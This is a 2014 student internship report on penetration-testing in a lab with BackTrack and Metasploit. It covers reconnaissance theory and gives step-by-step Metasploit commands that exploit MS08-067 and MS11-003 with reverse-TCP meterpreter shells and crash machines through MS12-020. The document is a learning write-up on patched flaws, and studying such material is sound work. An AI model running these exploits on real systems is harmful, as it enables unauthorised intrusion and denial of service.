1. VIETNAM NATIONAL UNIVERSITY OF HCMC
INTERNATIONAL UNIVERSITY
INTERNSHIP REPORT
by
ĐỖ LIÊN HÁN
Research and learn to use
Backtrack to exploit
Network vulnerabilities
Submitted to: School of Computer Science and Engineering
International University, VNU-HCM
August, 2014
2. Page | 2
INTERNSHIP REPORT
by
Đỗ Liên Hán
ITITIU10004
Submitted to: School of Computer Science and Engineering
International University, VNU-HCM
August, 2014
Organization/Company: Athena Center
Address: 92 Nguyễn Đình Chiểu , DaKao, Q1 , Tp HCM
Phone: (08)3 2210 3801 – 090 7879 477
Duration of the Internship: 8 weeks (16-07-2014 – 16-08-2014)
Supervisors during the Internship:
Supervisor: MR. Võ Đỗ Thắng.
Tittle: Lecturer
Phone: 0943230099
Supervisor
3. Page | 3
ACKNOWLEDGMENTS
I would like to show my sincere gratitude to International University and
Athena Center which have gave me condition to complete this Internship. In this
internship, I have many important experiences and essential knowledge that will help
me a lot in adapt to my later job.
I also want to say thanks to professors in school of computer science and
engineering have taught and equip me with necessary knowledge which help me
complete this topic.
Even though I have tried my best to complete this report, I believe that this
report may remain some mistake because of the deficiency in practical experience and
knowledge. I look forward to your understanding and sharing so I can make my report
better.
Hồ Chí Minh, August 1, 2014
Internship student
Đỗ Liên Hán.
4. Page | 4
TABLE OF CONTENTS
I. DESCRIPTION OF COMPANY/ORGANIZATION................................................5
II. SUMMARY OF THE INTERNSHIP.......................................................................6
III. PLANNING ............................................................................................................8
IV. INTERNSHIP ACTIVITIES & ACHIEVEMENTS...............................................9
1. General information about security........................................................9
2. Backtrack ...............................................................................................9
3. Footprinting..........................................................................................15
4. Scanning...............................................................................................17
5. Enumeration.........................................................................................18
V. INTERNSHIP ASSESSMENT...............................................................................30
REFERENCES ............................................................................................................31
5. Page | 5
I. Description of company/organization:
Athena is an education and training center of IT field. It was establish in 2004.
This center can allow people experience IT engineer’s work and study in order to
contribute to develop IT fields in Vietnam. Company name written in English is
ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED.
The major field of Athena:
Athena center has been focusing deeply on educating and training of system
and network security, network administrator, ecommerce,… follow the
standard quality of Microsoft, Linux LPI, Oracle, Cisco, CEH,… Moreover,
Athena center also has some separated program to train and educate for some
government organizations.
After 10 years, many trainees from Athena center do the job in IT fields for
some government organization and some big companies.
Besides training program, Athena center also cooperate and exchange
technology with some universities such as university of technology, university
of information technology, university of science,…
The instructors of Athena:
All the instructors of Athena center graduated from many top universities in
Vietnam. They all have to get international certificates such as CCNA, MCSA,
MCSE, CCNP, security+, CEH and have Microsoft certificate trainer. These
are required certificates to satisfy condition for teaching at Athena center.
Beside, Athena’s instructors are also go abroad to be updated new
technologies from USA, French, Holland,… and they transfer what they learn
to their learner at Athena.
6. Page | 6
II. Summary of Internship:
Nowadays, many devices like PC, laptop and mobile phone have internet
connection. On these devices install some program like IE, Microsoft Office, Acrobat
Reader,…. and run on some operating system like window XP, window 7. Some
mobile also face with some new techniques that allow hacker to add virus into some
program which they download from internet; these virus can get information of the
user when they don’t know any things. Even though they usually update from the
producer, their devices are still in threatened by hacker.
This topic is research about a program call backtrack which contain many
module that allow people to use them to test the other machine with some already
known vulnerabilities to gain control of the victim or just collect the information of
them.
During the internship, I learn to use backtrack from install it on VMWare and
attack on local network between virtual PC of the VMWare.
After that I test the attack of the Virtual Private Server to attack from different
network to my local machine.
In this topic, I test some vulnerability of windows XP and windows 7 which
are ms08-067, ms11-003 and ms12-020. These errors can allow attacker to gather
information of the user like computer name, OS, user access right and password.
7. Page | 7
These are my clips that I have recorded ervery steps of the process to complete
the vulnerabilities ms08_067, ms11_003 and ms12_020; and these have completed by
me with some help from my supervisor Prof. Vo Do Thang.
http://youtu.be/6SDqQTtkHmk
http://youtu.be/Z5LB5b545WE
http://youtu.be/xkV6DFm56b8
http://youtu.be/L2dBV0y_Hic
8. Page | 8
III. Planning:
- Week 1:
Receive material and prepare backtrack with windows.
Practice with vulnerability ms10_090, ms10_042.
- Week 2:
Test ms12_004.
Find information about ms08_067, ms12_020.
Practice with vulnerability ms08_067, ms12_020.
- Week 3:
Find information about ms11_003.
Practice with vulnerability ms11_003.
- Week 4:
Install and practice with metasploit.
Register VPS.
- Week 5:
Test attack from VPS to windows on VMWare of local machine.
- Week 6:
Try Exploit information from VPS to local machine.
- Week 7:
Complete system hacking class.
- Week 8:
Review and prepare for presentation.
9. Page | 9
IV. Internship Activities & Achievements:
1. General information about network security:
In july, we known a big problem have appear Viet Hong company has used a
software to track everything of mobile phone like contact list, messages, phone calls of
who has download the software called Ptracker used to spy customers. In this event
happened, about 14,000 mobile have been attacked by this company and lost a lot of
essential information. Ptracker will send every information about the user to this
company, this company also records the phone call to or from the cell phones and
messages which were installed Ptracker.
From this event, we can see the importance of security in these days. When
technology changes day by day, we must equip ourselves with enough knowledge about
security or at least we must know something to make sure that our private information
or our secret won’t be stolen by the others.
2. Backtrack:
BackTrack was a Linux distribution, superseded by Kali Linux, that focused on
security based on the Ubuntu Linux distribution aimed at digital forensics and
penetration testing use. In March 2013, the Offensive Security team rebuilt BackTrack
around the Debian distribution and released it under the name Kali Linux.
The evolution of BackTrack spans many years of development, penetration
tests, and unprecedented help from the security community. BackTrack originally
started with earlier versions of live Linux distributions called Whoppix, IWHAX, and
Auditor. When BackTrack was developed, it was designed to be an all in one live cd
used on security audits and was specifically crafted to not leave any remnants of itself
10. Page | 10
on the laptop. It has since expanded to being the most widely adopted penetration
testing framework in existence and is used by the security community all over the
world.
Install backtrack on VMWare:
First, I opened VMWare program and choose create a new virtual machine.
After that I follow the step below to create a new backtrack system on unix.
11. Page | 11
In this backtrack virtual machine I installed it with 20GB memory, 512MB
RAM and Network is NAT by use VMnet8.
Choose Default Boot Text Mode to continue.
12. Page | 12
Wait for some seconds, this window will appear and I typed startx to open
Graphical User Interface.
When it starts with GUI choose “install backtrack” it opened the windows as follow
picture.
13. Page | 13
To continue, I choose language for this backtrack program, time zone,
memory, key broad setting and wait for it to install complete the program.
14. Page | 14
Until this part I can choose
install to start install this software.
After click install, I have
to wait for some time to let the
program install complete.
15. Page | 15
When it run complete
this box will appear and click
restart to make the computer
restart again.
When it restarts complete, I can use the basic account root of backtrack to
login with user name: root and password: toor. Then start the GUI of backtrack to use
by command “startx” .
3. Footprinting:
A. Introduction:
Footprinting is the first and most convenient way that hackers use to gather
information about computer systems and the companies they belong to. The purpose
of footprinting to learn as much as you can about a system, it's remote access
capabilities, its ports and services, and the aspects of its security.
In order to perform a successful hack on a system, it is best to know as much as you
can, if not everything, about that system. While there is nary a company in the world
that isn't aware of hackers, most companies are now hiring hackers to protect their
systems. And since footprinting can be used to attack a system, it can also be used to
protect it. If you can find anything out about a system, the company that owns that
system, with the right personell, can find out anything they want about you.
16. Page | 16
An attacker will spend 90% of the time in profiling an organization and
another 10% in launching the attack
1. Information gathering
2. Determining the network range
3. Identifying active machines
4. Finding open ports and access points
5. OS fingerprinting
6. Fingerprinting services
7. Mapping the network
B. Type of footprinting:
1) Active footprinting:
Contact directly to the target to seek for information about target like: name,
address, owner, network, company, staff,…
Contact through email to find everything that can get.
This method requires many communication skills and skills to exploit
information.
2) Passive footprinting:
Different from active footprinting, passive footprinting is also popular. This is
a way to collect information through many free sources from the internet instead of
contact directly to employees or user of the target organization. For example, we can
access to some website provide service to know more information about some domain
name or address of website such as www.whoise.net, whoise.domaintools.com,
www.tenmien.vn, www.google.com,...
17. Page | 17
4. Scanning:
If footprinting is the identification of sources of information where the scanning
is finding all the gates to get into the information. In the footprinting process, we have
reached an IP network range and list the IP addresses through various techniques
including query whois and ARIN. This technique gives administrators more security
and hacker information contained on the destination network value, IP range, DNS
servers and mail servers. In this chapter, we will determine which system is listening
on network traffic and can be caught using a variety of tools and techniques such as
ping sweeps, port scans. We can easily pass firewall manually (bypass firewalls) to scan
the system assuming as it is blocked by the filtering policy criticism (filtering rules).
Objects Scanning:
Live System: Determine whether the system that we are targeting with
active or do not. Computers are scanning activity on the internet or not. IP address
state is left exposed in public.
Port: The next goal is to determine the port is open. The determination
of this port allows us to know that computers are open to public services. Since
then determine the purpose of attacks.
Operating System: Identifying the operating system is used on the
target computer will help hackers find out vulnerabilities common. The operating
system is more or less hidden holes enabling hackers hacked. Determine the
operating system must determine its version.
Service: Understanding the service is running and listening on the
target system. Version of services also contains small errors, but if you know
which exploits small, it does not little bit longer.
18. Page | 18
IP Address: Not only one of a host IP, we also carefully define address
ranges network address, and other relevant host as Default Gateway, DNS
Server,…
5. Enumeration:
Enumeration is next step in process of finding information of some
organizations, occurs after scanning and collection process and analyzing user names,
computer names, share resources and services. It also actively queries or binds to target
to get the information more reasonable. Enumeration can be defined process of
extracting information which got from scanning process into an orderly system. The
extracted information includes things related to the objectives to be attacked, such as
the user name (user name), the computer name (host name) or services (service),
resource sharing (share) listed are those techniques are controlled from inside the
environment. Enumeration phase includes connecting to the system and directly extract
the information. The aim of the technique is to identify the listed user accounts and
system accounts have the ability to use the hack on a target. No need to look for an
administrator account so we can increase this up to the account with privileges to allow
access to multiple accounts than previously granted.
Enumeration is also known as network or vulnerability discovery. It is the act
of obtaining information that is readily available from the target's system, applications
and networks. It is important to note that the enumeration phase is often the point where
the line between an ethical hack and a malicious attack can become blurred as it is often
easy to go outside of the boundaries outlined in the original attack plan.
In order to construct a picture of an organization's environment, several tools
and techniques are available. These tools and techniques include port scanning and
19. Page | 19
NMap. Although it is rather simple to collect information, it is rather difficult to
determine the value of the information in the hands of a hacker.
At first glance, enumeration is simple: take the collected data and evaluate it
collectively to establish a plan for more reconnaissance or building a matrix for the
vulnerability analysis phase. However, the enumeration phase is where the ethical
hacker's ability to make logical deductions plays an enormous role.
20. Page | 20
6. MS08-067:
MS08-067 is not categorized as virus, worm, Trojan or backdoor. It is a critical
vulnerability in the Windows Server Service on Windows 2008/Vista/2003/XP/2000
computers, which allows hackers to gain remote control of the affected computer with
the same privileges as the logged on user.
The Server Service allows the user's local resources, such as disks and
printers, to be shared, so that other users on the network can access them. However,
there is a vulnerability because this service does not properly handle specially crafted
RPC requests.
Remote Procedure Call (RPC) is a protocol used by a program to request a
service from a program located on another computer in a network.
If exploited successfully, MS08-067 allows hackers to gain remote control of
the affected computer with the same privileges as the logged on user. If this user
had administrator rights, the hacker could take complete control of the system: create,
modify or delete files, install programs, create new user accounts, etc.
MS08-067 is usually exploited by sending a specially crafted network
packet to a vulnerable system. On Windows Vista and Server 2008 systems, the
attacking user must be authenticated.
21. Page | 21
I have a victim computer and try to gain control of this one.
At first, I ping the IP address to make sure that victim computer have
connection. Then use nmap command to check the victim computer vulnerable or not.
When make sure that it is vulnerable, I start metaslpoit, and search for module.
22. Page | 22
Command:
Search ms08_067 – to find the module.
Use explioit/windows/smb/ms08_067_netapi – to apply module.
Show options – to see attribute of the module.
Set rhost 192.168.1.131- to specify the target
Set payload window/meterpreter/reverse_tcp - to create the response back
Set lhost 192..168.1.128 – to specify the ip of the attack PC to listen back
information of the victim.
Exploit – to execute the module to acttack to the victim.
23. Page | 23
.
Migrate to keep the connection with the victim computer.
I can know the process run on the victim through command “ps” and “sysinfo” can
allow me to know about computer information.
25. Page | 25
7. MS12_020:
Vulnerabilities in Remote Desktop Could Allow Remote Code Execution and it
only affect the computer which enable the Remote Desktop Protocol (RDP). By default,
the Remote Desktop Protocol (RDP) is not enabled on any Windows operating system.
This module exploits the MS12-020 RDP vulnerability originally discovered and
reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU
packet is handled in the maxChannelIDs field, which will result an invalid pointer being used,
therefore causing a denial-of-service condition.
CVE-2012-0002 is an internally reported vulnerability in Microsoft's Remote
Desktop Application. Patch for this vulnerability was released on March 13, 2012 as
MS12-020. This vulnerability can cause a full system compromise. Failed attempts to
exploit this vulnerability can cause a DoS for RDP.
26. Page | 26
This content some following command to exploit:
Msfconsole – to start metasploit.
Search ms12_020 – to find the module use in this test.
Use auxiliary/dos/windows/rdp/ms12_020_maxchannelids – to apply
module.
Show options – to show attribute of this module.
Set rhost xxx.xxx.xxx.xxx – this is the command for me to type in the
IP address of the target. Ex: set rhost 192.168.1.129 - in this example,
192.168.1.129 is the IP address of the target.
Run (or exploit) – this is the finally command to make the module
active, then I get the result as the picture above.
The operation system is crash so the computer was attacked and down. Every
works were running at that time suddenly stop this will cause a lot of trouble for the
user. The way to prevent this is set RDP is not enable.
27. Page | 27
8. MS11-003
1. Introduction:
Microsoft Internet Explorer have another vulnerability after so many
vulnerability have found by security researcher. The MS11_003 vulnerability actually
found at February 08, 2011 according to Microsoft security bulletin.
This module exploits a memory corruption vulnerability within Microsoft’s
HTML engine (mshtml). When parsing an HTML page containing a recursive CSS
import, a C++ object is deleted and later reused. This leads to arbitrary code
execution. This exploit utilizes a combination of heap spraying and the .NET 2.0
‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to
ASLR. As such, this module should be reliable on all Windows versions with .NET
2.0.50727 installed.
2. Exploiting Step by Step:
To start, I use msfconsole to start metasploit then I use command search
ms11_003 to find out the module for vulnerability ms11_003.
Type command use exploit/windows/browser/ms11_003_ie_css_import to
start the module.
Type command set payload/windows/meterpreter/reverse_tcp to create the
way for attackers to set the way for the PC to response when they successfully control
the victim’s computer.
Command show options will allow attacker to see the option they need to fill
in.
28. Page | 28
Next, the attackers have to set the server host, the listen host, the port and the
path so that they can receive the connection from the computer when the virus
successfully runs at the computer.
Finally, type the command exploit to make the metasploit generate a url from
the computer to access.
29. Page | 29
And this picture, this is the attack success. The attacker transfers the virus to the
computer access and gain control from the PC. After that, I can get information by command
sysinfo, get user right by getuid,…
30. Page | 30
V. Internship Assessment:
In the internship, I have learnt more information about some knowledge
about security which I can’t found in my school about this program. Backtrack is
a collection of tool for people who want to try to know more about security. Every
vulnerabilities have appeared in this operation system has been found by many
people and these were fixed. However, it doesn’t mean that this error will not
happened in our computer even it was known because sometimes the error is not
belong to the operation system it belong to the program run on the system that is
what I know more about the system when I learn how to use backtrack find out.
31. Page | 31
VI. Reference
[0] Athena Center internal Material and CDs.
[1] http://www.pandasecurity.com/homeusers/security-info/201683/information/MS08-067
[2] https://technet.microsoft.com/en-us/library/security/ms12-020.aspx
[3] https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[4] https://technet.microsoft.com/en-us/library/security/ms11-003.aspx
[5] http://www.hacking-tutorial.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-
vulnerability-using-metasploit-framework/#sthash.esO69EUT.dpbs